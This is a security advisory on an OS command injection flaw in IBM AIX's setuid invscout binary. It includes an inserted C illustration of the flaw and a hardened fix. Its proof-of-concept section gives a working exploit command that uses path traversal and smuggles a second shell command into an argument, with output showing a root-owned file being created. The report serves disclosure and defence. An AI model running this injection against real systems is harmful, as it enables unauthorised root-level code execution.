Talos Vulnerability Report

TALOS-2023-1691

IBM Corporation AIX invscout SetUID Binary OS Command Injection Vulnerability

April 24, 2023
CVE Number

CVE-2023-28528

SUMMARY

An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially crafted command-line argument can lead to execution of a privileged operation. An attacker can supply such an argument to trigger this vulnerability and gain arbitrary code execution.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

IBM Corporation AIX 7.2

PRODUCT URLS

AIX - http://us.ibm.com

CVSSv3 SCORE

5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

DETAILS

AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.

The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system().
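As an added illustration (not the invscout source, which this report does not include), the following C shows the shape of the flaw described above next to a hardened variant that keeps the package file name under a fixed directory and launches rpm through execv() with a fixed argument vector instead of a shell string; PKG_DIR, the function names and the rpm location are assumptions:

```c
/* Added illustration of the CWE-78 pattern described above and one way to close
 * it. Not invscout's source (not on this page); PKG_DIR, rpm_name_is_safe,
 * build_pkg_path, install_rpm and the rpm location are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define PKG_DIR "/var/adm/invscout/microcode/"   /* assumed package directory */
/* Vulnerable shape (not compiled): user text spliced into one shell string, so
 * ';' and other metacharacters run with the setuid binary's privilege:
 *   snprintf(cmd, sizeof cmd, "rpm -i %s %s", user_opts, user_rpm); system(cmd); */

/* Allow-list check: bare file name ending in ".rpm", no '/', no "..", and no
 * character a shell would interpret. Returns 1 if acceptable, else 0. */
int rpm_name_is_safe(const char *name)
{
    size_t n = strlen(name);
    if (n < 5 || n > 200 || strstr(name, "..") != NULL) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_' || c == '+')) return 0;
    }
    return strcmp(name + n - 4, ".rpm") == 0;
}

/* Pin the file under PKG_DIR; the caller never supplies directory components. */
int build_pkg_path(const char *name, char *out, size_t outsz)
{
    if (!rpm_name_is_safe(name)) return 0;
    return snprintf(out, outsz, "%s%s", PKG_DIR, name) < (int)outsz;
}

/* Install without a shell: fixed argv, fixed options, no string concatenation.
 * Returns rpm's exit status, or -1 if the name is rejected or exec fails. */
int install_rpm(const char *name)
{
    char path[512];
    if (!build_pkg_path(name, path, sizeof path)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "rpm", "-i", path, NULL };
        execv("/usr/bin/rpm", argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Because the shell is never involved and the only user-controlled text is validated against an allow-list, a value containing ';' or '..' is rejected before any process is spawned.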

Exploit Proof of Concept

The most trivial method of exploitation to gain command execution takes the following form:

$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo "
package info-6.7-1.ppc is already installed
/var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm
$ ls -la /etc/pwned
-rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned

Note: The umask is set to 0 prior to exploitation commencing.

TIMELINE

2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release

Credit

Discovered by Tim Brown of Cisco Security Advisory EMEAR.